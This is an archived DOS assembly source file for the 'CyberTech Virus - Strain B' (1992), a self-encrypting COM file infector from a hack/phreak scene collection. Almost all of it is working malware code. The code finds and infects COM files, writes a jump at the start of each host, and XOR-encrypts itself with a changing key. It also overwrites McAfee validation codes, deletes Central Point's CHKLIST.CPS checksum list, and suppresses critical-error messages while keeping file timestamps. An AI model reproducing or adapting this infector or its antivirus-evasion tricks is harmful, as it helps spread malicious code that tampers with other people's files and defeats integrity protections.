home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / CYBTCH-B.ASM < prev    next >
Assembly Source File  |  1992-11-29  |  22KB  |  501 lines

  1. ;
  2. ;  CyberTech Virus - Strain B                           John Tardy (C) 1992
  3. ;
  4. ;  Written in A86 V3.22
  5. ;
  6. ;  Description : This is a Non-Resident Self-Encrypting .COM file infector
  7. ;                which infects COM files in the current directory. It will
  8. ;                remove CHKLIST.CPS from the current directory after it has
  9. ;                infected a program. CHKLIST.CPS is a file which is used by
  10. ;                VDEFEND of PCSHELL and Central Point AntiVirus. When a
  11. ;                validation code is added by SCAN of McAfee, it will overwrite
  12. ;                the code, so the file is no longer CRC protected anymore.
  13. ;                After 1993, the virus activated. It then displays a message
  14. ;                that your system has been infected. The virus will remove
  15. ;                itself from the infected file and completely restore it. If
  16. ;                a validation code was added, it is lost, but the file is not
  17. ;                corrupted and will function normally. Even when the file is
  18. ;                compressed afterwards by an executable file compressor, it is
  19. ;                uncompressed. Before 1994, the virus sometimes display it's
  20. ;                copyright. This is caused when the random encryption counter
  21. ;                is a 0. It will redefine it, so there is no visible text in
  22. ;                the virus. It checks also if there is enough diskspace
  23. ;                aveable and installs a critical error handler.
  24. ;
  25.             Org 0h                              ; Generate .BIN file
  26.  
  27. Start:      Jmp MainVir                         ; Jump to decryptor code at EOF
  28.  
  29.             Db '*'                              ; Virus signature (very short)
  30.  
  31. ;
  32. ; Decryptor procedure
  33. ;
  34.  
  35. MainVir:    Call On1                            ; Push offset on stack
  36.  
  37. On1:        Pop BP                              ; Calculate virus offset
  38.             Sub BP,Offset MainVir+3             ;
  39.  
  40.             Push Ax                             ; Save possible error code
  41.  
  42.             Lea Si,Crypt[BP]                    ; Decrypt the virus with a
  43.             Mov Di,Si                           ; very simple exclusive or
  44.             Mov Cx,CryptLen                     ; function.
  45. Decrypt:    Lodsb                               ;
  46.             Xor Al,0                            ;
  47.             Stosb                               ;
  48.             Loop Decrypt                        ;
  49.  
  50. DecrLen     Equ $-MainVir                       ; Length of the decryptor
  51.  
  52. ;
  53. ; Main initialization procedure
  54. ;
  55.  
  56. Crypt:      Mov Ax,Cs:OrgPrg[BP]                ; Store begin of host at
  57.             Mov Bx,Cs:OrgPrg[BP]+2              ; cs:100h (begin of com)
  58.             Mov Cs:Start+100h,Ax                ;
  59.             Mov Cs:Start[2]+100h,Bx             ;
  60.  
  61.             Xor Ax,Ax                           ; Get original interrupt 24
  62.             Push Ax                             ; (critical error handler)
  63.             Pop Ds                              ;
  64.             Mov Bx,Ds:[4*24h]                   ;
  65.             Mov Es,Ds:[4*24h]+4                 ;
  66.  
  67.             Mov Word Ptr Cs:OldInt24[Bp],Bx     ; And store it on a save place
  68.             Mov Word Ptr Cs:OldInt24+2[Bp],Es   ;
  69.  
  70.             Lea Bx,NewInt24[Bp]                 ; Install own critical error
  71.             Push Cs                             ; handler to avoid messages
  72.             Pop Es                              ; when a disk is write
  73.             Mov Word Ptr Ds:[4*24h],Bx          ; protected and such things
  74.             Mov Word Ptr Ds:[4*24h]+2,Es        ;
  75.             Push Cs                             ;
  76.             Pop Ds                              ;
  77.  
  78.             Mov Ah,30h                          ; Check if DOS version is
  79.             Int 21h                             ; 3.0 or above for correct
  80.             Cmp Al,3                            ; interrupt use
  81.             Jae TestDate                        ;
  82.             Jmp Ready                           ;
  83.  
  84. TestDate:   Mov Ah,2ah                          ; Check if 1993 is past time
  85.             Int 21h                             ; already
  86.             Cmp Cx,1994                         ;
  87.             Jae Clean                           ; - 1994 or more
  88.             Jmp NoClean                         ; - Not 1994 or more
  89.  
  90. ;
  91. ; Main Cleanup procedure
  92. ;
  93.  
  94. Clean:      Mov Ah,1ah                          ; Move DTA to a safe place
  95.             Mov Dx,0fd00h                       ;
  96.             Int 21h                             ;
  97.  
  98.             Mov Ax,Cs:[2ch]                     ; Find the name of the
  99.             Mov Ds,Ax                           ; program that is now
  100.             Mov Si,0                            ; executed (me must search in
  101.             Mov Cx,4000h                        ; the DOS environment for
  102. Seeker:     Lodsb                               ; safe tracking of the name
  103.             Cmp Al,1                            ;
  104.             Je On3                              ;
  105.             Loop Seeker                         ;
  106.  
  107. On3:        Inc Si                              ; Transfer the found name
  108.             Push Cs                             ; to a safe address in memory
  109.             Pop Es                              ;
  110.             Mov Di,0fd80h                       ;
  111.             Mov Cx,80h                          ;
  112. Trans:      Lodsb                               ;
  113.             Cmp Al,0                            ;
  114.             Je Verder                           ;
  115.             Stosb                               ;
  116.             Loop Trans                          ;
  117.  
  118. Verder:     Stosb
  119.             Sub Di,12
  120.             Push Cs
  121.             Pop Ds
  122.             Mov Ax,[Di][0]                      ;
  123.             Cmp Ax,'OC'
  124.             Jne Normal
  125.             Mov Ax,[Di][2]
  126.             Cmp Ax,'MM'
  127.             Jne Normal
  128.             Mov Ax,[Di][4]
  129.             Cmp Ax,'NA'
  130.             Jne Normal
  131.             Jmp Ready
  132.  
  133. Normal:     Push Cs                             ; Read file attributes and
  134.             Pop Ds                              ; check if an error has
  135.             Mov Ax,4300h                        ; occured
  136.             Mov Dx,0fd80h                       ;
  137.             Int 21h                             ;
  138.             Jnc DeInfect                        ; - No error, DeInfect
  139.             Jmp Ready                           ; - Error, Ready
  140.  
  141. DeInfect:   Push Cx                             ; Store old file attributes
  142.  
  143.             Mov Ax,4301h                        ; Clear file attributes
  144.             Xor Cx,Cx                           ; (for read only etc.)
  145.             Int 21h                             ;
  146.  
  147.             Mov Ax,3d02h                        ; Open the file
  148.             Int 21h                             ;
  149.  
  150.             Mov Bx,Ax                           ; Read file date/time stamp
  151.             Mov Ax,5700h                        ; and store it on the stack
  152.             Int 21h                             ; for later use
  153.             Push Cx                             ;
  154.             Push Dx                             ;
  155.  
  156.             Mov Ah,3eh                          ; Close file
  157.             Int 21h                             ;
  158.  
  159.             Mov Dx,0fd80h                       ; Create a new file with the
  160.             Xor Cx,Cx                           ; same name
  161.             Mov Ah,3ch                          ;
  162.             Int 21h                             ;
  163.  
  164.             Mov Bx,Ax                           ; store file handle in BX
  165.  
  166.             Mov Dx,100h                         ; program to file (the original
  167.             Mov Cx,Bp                           ; file is now back again)
  168.             Sub Cx,0fch                         ;
  169.  
  170.             Mov Ah,40h                          ; write memory image of host
  171.             Int 21h                             ;
  172.  
  173.             Pop Dx                              ; restore file date/time
  174.             Pop Cx                              ; stamp
  175.             Mov Ax,5701h                        ;
  176.             Int 21h                             ;
  177.  
  178.             Mov Ah,3eh                          ; close file
  179.             Int 21h                             ;
  180.  
  181.             Pop Cx                              ; restore file attributes
  182.             Mov Ax,4301h                        ;
  183.             Mov Dx,0fd80h                       ;
  184.             Int 21h                             ;
  185.  
  186.             Push Cs                             ; Show message that the
  187.             Pop Ds                              ; system has been infected
  188.             Mov Ah,9                            ; and shutdown virus
  189.             Lea Dx,Removed[Bp]                  ;
  190.             Int 21h                             ;
  191.             Jmp Ready                           ;
  192.  
  193. ;
  194. ; Main viral part
  195. ;
  196.  
  197. NoClean:    Mov Ah,1ah                          ; Store DTA at safe place
  198.             Mov Dx,0fd00h                       ;
  199.             Int 21h                             ;
  200.  
  201.             Mov Ah,4eh                          ; FindFirsFile Function
  202.  
  203. Search:     Lea Dx,FileSpec[BP]                 ; Search for filespec given
  204.             Xor Cx,Cx                           ; in FileSpec adress
  205.             Int 21h                             ;
  206.             Jnc Found                           ; Found - Found
  207.             Jmp Ready                           ; Not Found - Ready
  208.  
  209. Found:      Mov Ax,4300h                        ; Get file attributes and
  210.             Mov Dx,0fd1eh                       ; store them on the stack
  211.             Int 21h                             ;
  212.             Push Cx                             ;
  213.  
  214.             Mov Ax,4301h                        ; clear file attributes
  215.             Xor Cx,Cx                           ;
  216.             Int 21h                             ;
  217.  
  218.             Mov Ax,3d02h                        ; open file with read/write
  219.             Int 21h                             ; access
  220.  
  221.             Mov Bx,5700h                        ; save file date/time stamp
  222.             Xchg Ax,Bx                          ; on the stack
  223.             Int 21h                             ;
  224.             Push Cx                             ;
  225.             Push Dx                             ;
  226.  
  227.             Mov Ah,3fh                          ; read the first 4 bytes of
  228.             Lea Dx,OrgPrg[BP]                   ; the program onto OrgPrg
  229.             Mov Cx,4                            ;
  230.             Int 21h                             ;
  231.  
  232.             Mov Ax,Cs:[OrgPrg][BP]              ; Check if renamed exe-file
  233.             Cmp Ax,'ZM'                         ;
  234.             Je ExeFile                          ;
  235.  
  236.             Cmp Ax,'MZ'                         ; Check if renamed weird exe-
  237.             Je ExeFile                          ; file
  238.  
  239.             Mov Ah,Cs:[OrgPrg+3][BP]            ; Check if already infected
  240.             Cmp Ah,'*'                          ;
  241.             Jne Infect                          ;
  242.  
  243. ExeFile:    Call Close                          ; If one of the checks is yes,
  244.             Mov Ah,4fh                          ; close file and search next
  245.             Jmp Search                          ; file
  246.  
  247. FSeek:      Xor Cx,Cx                           ; subroutine to jump to end
  248.             Xor Dx,Dx                           ; or begin of file
  249.             Int 21h                             ;
  250.             Ret                                 ;
  251.  
  252. Infect:     Mov Ax,0fd1e[0]                     ; check if the file is
  253.             Cmp Ax,'OC'                         ; COMMAN?.COM (usually result
  254.             Jne NoCommand                       ; if COMMAND.COM)
  255.             Mov Ax,0fd1e[2]                     ;
  256.             Cmp Ax,'MM'                         ;
  257.             Jne NoCommand                       ;
  258.             Mov Ax,0fd1e[4]                     ;
  259.             Cmp Ax,'NA'                         ;
  260.             Jne NoCommand                       ;
  261.  
  262.             Mov Ax,4202h                        ; Jump to EOF
  263.             Call Fseek                          ;
  264.  
  265.             Cmp Ax,0f000h                       ; Check if file too large
  266.             Jae ExeFile
  267.  
  268.             Cmp Ax,VirS                         ; Check if file to short
  269.             jbe ExeFile
  270.             
  271.             Sub     Ax,VirS  
  272.             Xchg    Cx,Dx
  273.             Mov     Dx,4200h
  274.             Xchg    Dx,Ax
  275.             Mov     EOFminVir[BP],Dx
  276.             Int     21h
  277.             Mov     Ah,3fh
  278.             Mov     Dx,Offset Buffer
  279.             Mov     Cx,VirS  
  280.             Int     21h
  281.             Cld
  282.             Mov     Si,Offset Buffer
  283.             Mov     Cx,VirLen
  284. On5:
  285.             Push    Cx
  286. On6:        Lodsb
  287.             Cmp     Al,0
  288.             Jne     On4
  289.             Loop    On6
  290. On4:        Cmp     Cx,0
  291.             Je      Found0
  292.  
  293.             Pop     Cx
  294.             Cmp     Si,SeekLen
  295.             Jb      On5
  296.             Jmp     NoCommand
  297.  
  298. Found0:     Pop     Cx
  299.             Sub     Si,Offset Buffer
  300.             Sub     Si,Cx
  301.             Xor     Cx,Cx
  302.             Mov     Dx,EOFminVir[BP]
  303.             Add     Dx,Si
  304.  
  305.             Mov     Ax,4200h
  306.             Int     21h
  307.             Jmp     CalcVirus
  308.  
  309. EOFminVir   Dw 0
  310.  
  311. NoCommand:  Mov Ax,4202h                        ; jump to EOF
  312.             Call FSeek                          ;
  313.  
  314.             Cmp Ax,0f000h                       ; Check if file too large
  315.             Jb NoExe1                           ; if yes, goto exefile
  316.             Jmp ExeFile                         ;
  317.  
  318. NoExe1:     Cmp Ax,10                           ; Check if file too short
  319.             Ja NoExe2                           ; if yes, goto exefile
  320.             Jmp ExeFile                         ;
  321.  
  322.  
  323. NoExe2:     Mov Cx,Dx                           ; calculate pointer to offset
  324.             Mov Dx,Ax                           ; EOF-52 (for McAfee validation
  325.             Sub Dx,52                           ; codes)
  326.  
  327.             Mov Si,Cx                           ; move file pointer to the
  328.             Mov Di,Dx                           ; calculated address
  329.             Mov Ax,4200h                        ;
  330.             Int 21h                             ;
  331.  
  332.             Mov Ah,3fh                          ; read the last 52 bytes
  333.             Mov Dx,0fb00h                       ; of the file
  334.             Mov Cx,52                           ;
  335.             Int 21h                             ;
  336.  
  337.             Cmp Ds:0Fb00h,0fdf0h                ; check if protected with the
  338.             Jne Check2                          ; AG option
  339.             Cmp Ds:0fb02h,0aac5h                ;
  340.             Jne Check2                          ;
  341.  
  342.             Mov Ax,4200h                        ; yes - let virus overwrite
  343.             Mov Cx,Si                           ; the code with itself, so
  344.             Mov Dx,Di                           ; the file has no validation
  345.             Int 21h                             ; code
  346.             Jmp CalcVirus                       ;
  347.  
  348. Check2:     Cmp Ds:0Fb00h+42,0fdf0h             ; check if protected with the
  349.             Jne Eof                             ; AV option
  350.             Cmp Ds:0Fb02h+42,0aac5h             ;
  351.             Jne Eof                             ;
  352.  
  353.             Mov Ax,4200h                        ; yes - let virus overwrite
  354.             Mov Cx,Si                           ; the code with itself, so
  355.             Mov Dx,Di                           ; the file has no validation
  356.             Add Dx,42                           ; code
  357.             Int 21h                             ;
  358.             Jmp CalcVirus                       ;
  359.  
  360. Eof:        Mov Ax,4202h                        ; not AG or AV - jump to
  361.             Call Fseek                          ; EOF
  362.  
  363. CalcVirus:  Sub Ax,3                            ; calculate the jump for the
  364.             Mov Cs:CallPtr[BP]+1,Ax             ; virus start
  365.  
  366. GetCrypt:   Mov Ah,2ch                          ; get 100s seconds for the
  367.             Int 21h                             ; encryption value.
  368.             Cmp Dl,0                            ; if not zero, goto NoZero
  369.             Jne NoZero                          ;
  370.  
  371.             Mov Ah,9                            ; If zero, display copyright
  372.             Lea Dx,Msg[Bp]                      ; message and generate again
  373.             Int 21h                             ; a number
  374.             Jmp GetCrypt                        ;
  375.  
  376. NoZero:     Mov Cs:Decrypt+2[BP],Dl             ; Store key into decryptor
  377.  
  378.             Lea Si,MainVir[BP]                  ; Move changed decryptor to
  379.             Mov Di,0fb00h                       ; a safe place in memory
  380.             Mov Cx,DecrLen                      ;
  381.             Rep Movsb                           ;
  382.  
  383.             Lea Si,Crypt[BP]                    ; Encrypt the virus and merge
  384.             Mov Cx,CryptLen                     ; it to the changed decryptor
  385. Encrypt:    Lodsb                               ; code
  386.             Xor Al,Dl                           ;
  387.             Stosb                               ;
  388.             Loop Encrypt                        ;
  389.  
  390.             Mov Ah,40h                          ; append virus at EOF or over
  391.             Lea Dx,0fb00h                       ; the validation code of
  392.             Mov Cx,VirLen                       ; McAfee
  393.             Int 21h                             ;
  394.  
  395.             Mov Ax,4200h                        ; Jump to BOF
  396.             Call FSeek                          ;
  397.  
  398.             Mov Ah,40h                          ; Write Jump at BOF
  399.             Lea Dx,CallPtr[BP]                  ;
  400.             Mov Cx,4                            ;
  401.             Int 21h                             ;
  402.  
  403.             Call Close                          ; Jump to Close routine
  404.  
  405. Ready:      Mov Ah,1ah                          ; Restore DTA to normal
  406.             Mov Dx,80h                          ; offset
  407.             Int 21h                             ;
  408.  
  409.             Mov Ax,Cs:OldInt24[Bp]              ; remove critical error
  410.             Mov Dx,Cs:OldInt24+2[Bp]            ; handler and store the
  411.             Xor Bx,Bx                           ; original handler at the
  412.             Push Bx                             ; interrupt table
  413.             Pop Ds                              ;
  414.             Mov Ds:[4*24h],Dx                   ;
  415.             Mov Ds:[4*24h]+2,Ax                 ;
  416.             Push Cs                             ;
  417.             Pop Ds                              ;
  418.  
  419.             Pop Ax                              ; restore possible error code
  420.  
  421.             Mov Bx,100h                         ; nice way to jump to the
  422.             Push Cs                             ; begin of the original host
  423.             Push Bx                             ; code
  424.             Retf                                ;
  425.  
  426. Close:      Pop Si                              ; why???
  427.  
  428.             Pop Dx                              ; restore file date/time
  429.             Pop Cx                              ; stamp
  430.             Mov Ax,5701h                        ;
  431.             Int 21h                             ;
  432.  
  433.             Mov Ah,3eh                          ; close file
  434.             Int 21h                             ;
  435.  
  436.             Mov Ax,4301h                        ; restore file attributes
  437.             Pop Cx                              ;
  438.             Mov Dx,0fd1eh                       ;
  439.             Int 21h                             ;
  440.  
  441.             Mov Ah,41h                          ; delete CHKLIST.CPS (the
  442.             Lea Dx,CpsName[BP]                  ; Central Point CRC list)
  443.             Int 21h                             ;
  444.  
  445.             Push Si                             ; why???
  446.             Ret
  447.  
  448. ;
  449. ; Message when we are in 1994
  450. ;
  451.  
  452. ;Removed     Db 13,10,'Virus removed : ',13,10
  453.  
  454. Removed     Db 13,10,'The previous year you have been infected by a virus'
  455.             Db 13,10,'without knowing or removing it. To be gentle to you'
  456.             Db 13,10,'I decided to remove myself from your system. I suggest'
  457.             Db 13,10,'you better buy ViruScan of McAfee to ensure yourself'
  458.             Db 13,10,'complete security of your precious data. Next time you'
  459.             Db 13,10,'could be infected with a malevolent virus.'
  460.             Db 13,10,10,'May I say goodbye to you for now....',13,10
  461.  
  462. ;
  463. ; Message when encryption byte = 0 or when we are living in 1994
  464. ;
  465.  
  466. Msg         Db 13,10,'CyberTech Virus - Strain B'
  467.             Db 13,10,'(C) 1992 John Tardy of Trident'
  468.             Db 13,10,'$'
  469.  
  470. ;
  471. ; New critical error handler
  472. ;
  473.  
  474. NewInt24:   Mov Al,3                            ; supress any critical error
  475.             Iret                                ; messages
  476.  
  477. CpsName     Db 'chklist.cps',0                  ; name for CP CRC-list
  478.  
  479. OldInt24    Dd 0                                ; storage place for old int 24
  480.  
  481. CallPtr     Db 0e9h,0,0                         ; jump to place at BOF
  482.  
  483. FileSpec    Db '*.COM',0                        ; filespec and infection marker
  484.  
  485. OrgPrg:     Int 20h                             ; original program
  486.             Db 'JT'                             ;
  487.  
  488. CryptLen    Equ $-Crypt                         ; encrypted part length
  489.  
  490. VirLen      Equ $-MainVir                       ; total virus length
  491.  
  492. Buffer      Equ 0f040h                          ; buffer offset
  493. VirS        Equ VirLen*2
  494.  
  495. SeekLen     Equ Buffer+Virs
  496.  
  497. ;  ─────────────────────────────────────────────────────────────────────────
  498. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  499. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  500. ;  ─────────────────────────────────────────────────────────────────────────
  501.